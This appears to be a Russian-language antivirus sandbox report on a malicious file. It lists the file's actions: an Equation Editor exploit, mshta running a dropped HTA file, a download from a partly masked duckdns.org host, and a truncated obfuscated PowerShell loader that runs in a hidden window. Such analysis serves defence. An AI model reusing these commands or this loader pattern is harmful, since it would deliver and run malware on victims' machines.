Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\mshta.exe' "%APPDATA%\vbc.hta"
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\vbc.hta
Сетевая активность
TCP
Запросы HTTP GET
- http://ma##########frontalldistribute.duckdns.org/084420.hta
UDP
- DNS ASK ma##########frontalldistribute.duckdns.org
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted $yfgnhfsg = $Null;function blicoae($nljiqr){return -join($nljiqr-split'(..)'|? L*h|%{[char]+('0x'+$_)})};function blslrjqc($jawwx, $xbjstn){$epfgxo = $env:PUBLIC+(...' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
